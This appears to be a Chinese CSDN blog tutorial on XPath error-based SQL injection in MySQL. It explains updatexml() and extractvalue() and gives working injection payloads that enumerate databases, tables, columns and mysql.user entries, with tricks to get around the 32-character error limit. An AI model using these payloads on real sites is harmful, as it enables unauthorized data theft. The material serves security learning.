xpath报错注入

已于 2023-11-21 17:03:54 修改
阅读量253 收藏
点赞数 1
文章标签: sql 数据库
于 2023-11-20 18:05:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75178803/article/details/134492658
版权
  • 什么是xml?

XML 指可扩展标记语言,是一种很像HTML的标记语言(XML 不是 HTML 的替代),XML 的设计宗旨是传输数据,而不是显示数据。XML 标签没有被预定义。用户可以自行定义标签。XML 被设计为具有自我描述性。

  • 但xml不会对数据内容做任何事情

下面实例是 Jani 写给 Tove 的便签,存储为 XML:

<note>
<to>Tove</to>
<from>Jani</from>
<heading>Reminder</heading>
<body>Don't forget me this weekend!</body>
</note>

上面的这条便签具有自我描述性。它包含了发送者和接受者的信息,同时拥有标题以及消息主体。但它仍然没有做任何事情,仅仅是包装在 XML 标签中的纯粹的信息。我们需要编写软件或者程序,才能传送、接收和显示出这个文档

  •  xml可以让用户自定义自己的标签

上面实例中的标签,没有在任何 XML 标准中定义过(比如 <to> 和 <from>)。这些标签是由用户创造的。这是因为 XML 语言没有预定义的标签。XML 允许创作者定义自己的标签和自己的文档结构。

HTML 中使用的标签都是预定义的。HTML 文档只能使用在 HTML 标准中定义过的标签(如 <p>、<h1> 等)。

  • xml和html有什么区别?

XML被设计为传输和存储数据,其焦点是数据的内容。

HTML被设计用来显示数据,其焦点是数据的外观。

在大多数web应用程序中,XML用于传输数据,而HTML用于格式化并显示数据。

  • 什么是报错注入?

报错注入在没法用union联合查询时用,且不能过滤一些关键的函数。

报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。这里主要记录一下xpath语法错误导致的报错注入类型

  • 报错注入的条件是什么?

1.报错信息必须是动态的、来自数据库的报错信息。
2.网站写死的、自定义的报错提示不算。

  • 什么是xpath?

XPath 是一门在 XML 文档中查找信息的语言。

           XPath 使用路径表达式在 XML 文档中进行导航;
           XPath 包含一个标准函数库。

           ...

来源于:XPath 教程 | 菜鸟教程

  • 什么是xpath节点?

在 XPath 中,有七种类型的节点:元素、属性、文本、命名空间、处理指令、注释以及文档(根)节点。XML 文档是被作为节点树来对待的。树的根被称为文档节点或者根节点。

例子:下面这个 XML 文档:

<?xml version="1.0" encoding="UTF-8"?>

<bookstore>
  <book>
    <title lang="en">Harry Potter</title>
    <author>J K. Rowling</author>
    <year>2005</year>
    <price>29.99</price>
  </book>
</bookstore>

上面的XML文档中的节点例子:

<bookstore> (文档节点)
<author>J K. Rowling</author> (元素节点)
lang="en" (属性节点)

来源于:XPath 节点 | 菜鸟教程

  • 报错函数

updatexml函数

语法:UPDATEXML(XML_document,XPath_string,new_value)

第一个参数:是string格式,为XML文档对象的名称,第二个参数:代表路径,Xpath格式的字符串例如//title 第三个参数:string格式,替换查找到的符合条件的数据

SQL报错注入的应用:当使用updatexml(XML_document,XPath_string,new_value)函数时,若xpath_string参数不符合xpath格式,就会报错。

而~符号(ascii编码值:0x7e)是不存在xpath格式中的, 所以一旦在XPath_string参数中使用~符号,就会产生xpath syntax error (xpath语法错误),通过使用这个方法就可以达到报错注入的目的。

函数参数有三个

  • XML数据
  • XPath表达式:用于指定要修改的节点位置
  • 新的节点值:用于替换当前节点的值

updatexml函数报错的原理是:

UPDATEXML(XML_document,XPath_string,new_value);
第一个参数:XML的内容
第二个参数:是需要update的位置XPATH路径
第三个参数:是更新后的内容
所以第一和第三个参数可以随便写,只需要利用第二个参数,他会校验你输入的内容是否符合XPATH格式

而第二个参数xpath_string(xpath格式的字符串),我们在注入的时候把第二个参数变为非xpath格式自然会报错

实例:

现在有以下的XML类型的数据:

<root>
  <message>
    <sender>Tom</sender>
    <receiver>Kate</receiver>
    <content>Hello, how are you?</content>
  </message>
</root>

我们可以用updatexml函数来替换节点的值,比如将消息内容的值替换为新的内容

UPDATE messages
SET msg = UPDATEXML(msg, '/root/message/content', 'I am fine, thank you.')
WHERE id = 1;

上面的语句将会把表中id为1的记录的content节点的值修改为"I am fine, thank you."。

实操见:

知识点选自:详解MySQL的UPDATEXML()函数:更新 XML 文档中的节点值 - Python技术站

extractvalue函数:此函数从目标XML中返回包含所查询值的字符串
语法:extractvalue(XML_document,xpath_string)

第一个参数:string格式,为XML文档对象的名称 第二个参数:xpath_string(xpath格式的字符串) xml中的位置是可操作的地方,xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报错,并且会返回我们写入的非法格式内容,而这个非法的内容就是我们想查询的内容。正常查询 第二个参数的位置格式 为 /xxx/xx/xx/xx ,即使查询不到也不会报错

SQL报错注入的应用:当使用extractvalue(XML_document,xpath_string)函数时,若xpath_string参数不符合xpath格式,就会报错。

而~符号(ascii编码值:0x7e)是不存在xpath格式中的, 所以一旦在xpath_string参数中使用~符号,就会产生xpath syntax error (xpath语法错误),通过使用这个方法就可以达到报错注入的目的。

实操见:

  • 突破报错函数长度限制

updatexml() 和extractvalue()函数的报错内容长度不能超过32个字符,常用的解决方式有两种:

  1. limit 分页
  2. substr()截取字符

  • limit分页

以查询数据库用户为例:

?id=-1' and updatexml(1,concat(0x7e,
    (select user
    from mysql.user limit 1,1)
),3) -- a

  • substr()截取字符

以查询数据库用户为例:

?id=-1' and updatexml(1,concat(0x7e,
    substr(
        (select group_concat(user)
        from mysql.user)
    , 1 , 31)
),3) -- a

  • 报错注入步骤

1. 判断是否有注入点且注入点类型是什么

参数中添加任意内容,判断是注入点后再判断其注入类型

-- 空格为单行注释符

?id=1' --

2. 判断报错条件

参数中添加报错函数,检查报错信息是否正常回显在页面上

?id=1' and updatexml(1,'~',3) --

3. 获取所有数据库

用concat函数拼接特殊符号和查询结果

1,31表示从第1个字符开始截取,截取31个字符

?id=-1' and updatexml(1,concat('~',
    substr(
        (select group_concat(schema_name)
        from information_schema.schemata)
    , 1 , 31)
),3) --

4.获取所有表

?id=-1' and updatexml(1,concat('~',
    substr(
        (select group_concat(table_name)
        from information_schema.tables
        where table_schema = 'xxx')
    , 1 , 31)
),3) --

5.获取所有字段

?id=-1' and updatexml(1,concat('~',
    substr(
        (select group_concat(column_name)
        from information_schema.columns
        where table_schema = 'xxx' and table_name = 'xx')
    , 1 , 31)
),3) --

7.获取字段下的数据

本文所有知识点引用源于:

xpath报错注入_xpath syntax_硫酸超的博客-CSDN博客

【精选】SQL报错型注入原理-详细讲解 extractvalue()、updatexml()、floor() 的报错原因-CSDN博客 sql注入之报错注入-CSDN博客

报错注入是什么?一看你就明白了。报错注入原理+步骤+实战案例-CSDN博客

【精选】updatexml函数-报错注入原理学习_身高两米不到的博客-CSDN博客

访白鹿
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql漏洞函数xpath_XPATH注入
weixin_30185907的博客
01-28 667
前言在网上看到了一个XPATH注入,发现自己确实有的地方没见过。。就拿来学习了一下链接:XPATHXPath 即为 XML 路径语言,是 W3C XSLT 标准的主要元素,它是一种用来确定 XML(标准通用标记语言的子集)文档中某部分位置的语言。XPath 基于 XML 的树状结构,有不同类型的节点,包括元素节点,属性节点和文本节点,提供在数据结构树中找寻节点的能力,可用来在 XML 文档中对元素...
xpath 爬虫错误求指教
weixin_46613397的博客
06-25 372
标题 xpath 爬虫错误求指教 import parsel #1、获取数据源,headers参数 base_url = "https://www.umei.cc/gaoxiaotupian/" headers = {'user-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36 Edg/83.0.478.54'}
MYSQL注入之XPATH语法错误报错扩展
cyynid的博客
06-05 766
但是对于此类报错来说,其报错函数并不止上述提供的两个,不同的数据库版本有不同的报错函数,本文提供一个自动化脚本,可以自动化的检测各个版本的Xpath报错函数,其原理非常简单,就是通过爬虫爬取mysql官方文档的函数内容,构造报错输入,进行测试,来实现自动化的报错函数检测。#都处于标签scope="row"之下,并且没有被包裹,因此可以用xpath进行定位,然后使用正则提取出函数名。#都处于标签scope="row"之下,并且没有被包裹,因此可以用xpath进行定位,然后使用正则提取出函数名。
xpath语法及问题简略解析
g11023225的博客
05-12 473
tags: python,xpath,爬虫,requests,lxml 使用xpath进行网页爬虫的基本步骤 import requests from lxml import etree headers = { 'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36' ' (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36' } .
Xpath报错注入(extractvalue和updatexml)
石页
03-25 1290
updatexml() 函数报错注入原理 updatexml() 函数定义 UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称; 第二个参数:XPath_string (Xpath格式的字符串); 第三个参数:new_value,String格式,替换查找到的符合条件的数据; updatexml() 函数运行机制 该函数对XPath_string进行查询操作
XPath Syntax
11-16 285
XPath Syntax XPath uses path expressions to select nodes or node-sets in an XML document. The node is selected by following a path or steps.The XML Example DocumentWe will use the followi
MYSQL updatexml()函数报错注入解析
09-09
这个函数在处理XML数据时非常有用,但同时也可能成为安全漏洞的来源,特别是在没有正确过滤用户输入的情况下,可能导致SQL报错注入。 `updatexml()`函数的基本语法如下: ```sql UPDATEXML(XML_document, XPath_...
7. updatexml()报错注入 示例1
08-03
updatexml()报错注入 示例1”所示。 首先,我们来详细了解一下`updatexml()`函数的参数: 1. **XML_document**: 这是函数的第一个参数,它是一个字符串类型,表示XML文档的对象名称。在示例中,它被命名为`Doc`。...
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
报错注入是指攻击者通过构造特定的SQL语句,让攻击者想要查询的信息通过页面的错误提示回显出来。报错注入一般需要具备两个前提条件: 1. Web应用程序未关闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上...
SQL注入 报错(updatexml与extractvalue函数介绍)-01
09-15
SQL注入报错(updatexml与extractvalue函数介绍) SQL注入是一种常见的Web应用安全漏洞,它是指攻击者通过在Web应用的输入中inject恶意的SQL代码,来获取或修改数据库中的数据。今天,我们将讨论SQL注入报错的两种...
Xpath注入攻击及其防御技术研究
weixin_34273046的博客
02-02 510
Xpath注入攻击及其防御技术研究 陆培军 (南通大学 计算机科学与技术学院,江苏 南通226019)     摘 要 XML技术被广泛使用,XML数据的安全性越来越重要。本文简要介绍了XPath注入攻击XML数据的原理。在前人提出的防御通用方法的基础上,提出一个XPath 注入攻击通用检验模型,模型具有普遍意义。     关键词 XPath注入攻击; 防御技术; 模型 ...
已解决javax.xml.xpath.XPathExpressionException: XPath表达式异常的正确解决方法,亲测有效!!!
最新发布
小明的Java问道之路
04-09 977
已解决javax.xml.xpath.XPathExpressionException: XPath表达式异常的正确解决方法,亲测有效!!!
sql注入漏洞
Enya1122的博客
02-04 1377
SQL注入:是发生于应用程序与数据库层的安全漏洞。简而言之,是在输入的字符串中注入SQL指令,在设计的不良程序当中忽略了字符检查,那么这些注入进去的恶意指令就会被数据库服务器误认为是正常的SQL指令而运行,因此遭到破化或入侵。代码层面的话,好像是这样的放一张看起来以后有用的图。
sql报错注入
Ran_799的博客
07-10 378
简单的sql报错注入笔记
SQL报错型注入原理-详细讲解 extractvalue()、updatexml()、floor() 的报错原因
大大大蜜蜂的博客
10-12 5297
SQL报错型注入原理 一、xpath语法格式错误的报错: mysql5.1.5版本中添加了extractvalue()、updatexml()函数,它们两个分别能够对XML文档进行查询、修改操作,下面分别对这两个函数进行介绍。 这里是MYSQL对extractvalue()和updatexml()的官方介绍 1、extractvalue(xml_frag, xpath_expr):从一个使用xpath语法的xml字符串中提取一个值。 xml_frag:xml文档对象的名称,是一个string类型。 xpat
java意外的标识符_SyntaxError:带有xpath的意外标识符(SyntaxError: Unexpected identifier with xpath)...
weixin_29692851的博客
03-02 727
SyntaxError:带有xpath的意外标识符(SyntaxError: Unexpected identifier with xpath)我正在学习xpath,我正在尝试从html usint xpath获取一些数据我发现谷歌浏览器有一个“复制xpath”的选项,它很好用但对这个例子不起作用some divs 我在谷歌Chrome控制台上使用它$x("//*[@id="site-m...
怎么调取cstring left函数_Go语言函数深度解析(上)
weixin_39605414的博客
11-22 196
基本原理函数,几乎是每种编程语言的必备语法,通过函数把一系列的动作汇总起来,在不同的地方重复使用。我们在数学中曾经就使用过函数,他的形式类似于y=f(x),这就是一个完整的调用过程,y就是函数计算后得到的值,x就是传入的变量。怎么用?相信在看这个教程的人肯定已经接触过其他的编程语言,我就不多废话了,就是干。go语言中最基本的函数是这样的,以func为关键字标记函数funcfunctionPara...
mysql漏洞函数xpath_【漏洞汇总】SQL 注入漏洞之 mysql
weixin_35917998的博客
01-19 526
日期:2019-07-23 19:55:59更新:2019-08-02 10:40:37作者:Bay0net介绍:Mysql 注入笔记0x01、 基本信息1.1 基本术语数据库: 数据库是一些关联表的集合。数据表: 表是数据的矩阵。在一个数据库中的表看起来像一个简单的电子表格。列: 一列(数据元素) 包含了相同类型的数据, 例如邮政编码的数据。行:一行(=元组,或记录)是一组相关的数据,例如一条用...
一个低级错误,XPath中/和//
The Time With Working
07-15 2533
昨天我做的一个程序中被发现有一个错误,我检查了程序,但是没有问题,检查XSLT文件,找到了问题所在,这是一个比较低级的失误。XPath的路径选择错误。先说明一下程序的结构,数据记录在MS SQL2000中,使用ASP访问数据库,把它展示出来,因为这是一个分级的树形结构,所以我用XML来作为数据集的结构,而没有使用Recordset。它的XML结构如下:http://www.w3.org/2001/
from xlml import xpathxpath报错
12-09
根据提供的引用内容,可能是由于您在导入模块时出现了拼写错误。正确的导入语句应该是`from lxml import etree`。然后,您可以使用`etree.XPath`来执行XPath查询。以下是一个简单的示例: ```python from lxml import etree # 创建XML文档 root = etree.Element("root") root.append(etree.Element("child")) root.append(etree.Element("child")) child1 = root[0] child2 = root[1] # 执行XPath查询 result = root.xpath("//child") print(len(result)) # 输出:2 ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值